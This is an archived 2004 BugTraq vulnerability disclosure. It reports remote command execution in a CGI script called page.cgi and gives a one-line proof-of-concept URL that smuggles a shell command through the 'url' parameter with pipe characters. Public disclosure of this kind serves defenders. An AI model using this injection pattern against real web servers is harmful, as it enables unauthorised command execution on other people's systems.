BugTraq
Remote Command Execution Aug 06 2004 05:10AM
Francisco Alisson (dominusvis click21 com br)


Script affected: page.cgi - content/template merging CGI

Author: Andrew Kilpatrick

We can execute arbitrary commands with same id of the webserver:

http://www.vulnerable.com/page.cgi?url=.html|id|

Thanks :)

<Dominus_Vis>

[Infektion Group]

irc.phey.net -j #infektion

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus